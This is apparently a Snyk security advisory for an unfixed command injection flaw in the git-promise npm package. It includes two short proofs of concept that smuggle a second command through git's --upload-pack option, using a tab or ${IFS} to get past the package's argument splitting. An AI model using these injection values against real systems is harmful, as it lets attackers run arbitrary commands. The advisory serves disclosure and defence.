Command Injection Affecting git-promise package, versions *



    Attack Complexity Low
    Privileges Required High
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    EPSS 0.7% (78th percentile)
Expand this section
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-GITPROMISE-2434310
  • published 8 Jun 2022
  • disclosed 28 Mar 2022
  • credit Liran Tal

How to fix?

There is no fixed version for git-promise.


git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.

Affected versions of this package are vulnerable to Command Injection due to an inappropriate fix of a prior vulnerability in this package. Note: Please note that the vulnerability will not be fixed. The README file was updated with a warning regarding this issue.

PoC 1

const git = require("git-promise");
// Use tab instead of spaces to separate between the touch command and its argument
git("fetch origin --upload-pack=touch	/tmp/abcd", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))

PoC 2

const git = require("git-promise");
// Use the shell's predefined separator using ${IFS} to escape the whitespace splitting logic
git("fetch origin --upload-pack=touch${IFS}/tmp/abcd-new", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))